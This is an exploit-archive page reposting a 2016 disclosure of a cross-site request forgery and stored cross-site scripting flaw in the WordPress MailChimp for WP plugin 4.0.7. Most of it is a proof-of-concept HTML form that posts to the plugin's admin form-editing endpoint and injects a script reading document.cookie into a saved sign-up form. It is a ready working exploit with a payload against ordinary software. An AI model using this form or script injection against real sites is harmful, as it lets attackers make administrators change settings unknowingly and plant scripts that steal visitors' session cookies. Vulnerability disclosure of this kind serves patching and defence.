WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / XSS

2016.11.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : https://wordpress.org/plugins/mailchimp-for-wp/ # Category: [ Webapps ] # Tested on: [ Win ] # Version: 4.0.7 # Date: 2016/11/19 ###################### # # PoC: # I would like to disclose CSRF and stored XSS vulnerability in Wordpress plugin MailChimp 4.0.7. # Demo Construction : http://persian-team.ir/showthread.php?tid=192 # The Code for CSRF.html is : <form action="http://localhost/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" method="POST"> Title:<input type="text" name="mc4wp_form[name]" size="30" value="For Testing" id="title" spellcheck="true" autocomplete="off" placeholder="Enter the title of your sign-up form" style="line-height: initial;" > <input type="submit" style="display: none; " /> <input type="hidden" name="_mc4wp_action" value="edit_form" /> <input type="hidden" name="mc4wp_form_id" value="60" /> <input type="hidden" id="_mc4wp_nonce" name="_mc4wp_nonce" value="ad1a3e81af" /> <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&amp;view=edit-form&amp;form_id=60" /> <h2>Form Fields</h2> <textarea class="widefat" cols="160" rows="20" id="mc4wp-form-content" name="mc4wp_form[content]" placeholder="Enter the HTML code for your form fields.." autocomplete="false" autocorrect="false" autocapitalize="false" spellcheck="false"> <script>alert(document.cookie)</script><p> </textarea> <input type="hidden" id="required-fields" name="mc4wp_form[settings][required_fields]" value="" /> <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /></p> </form> # ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : http://persian-team.ir ######################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top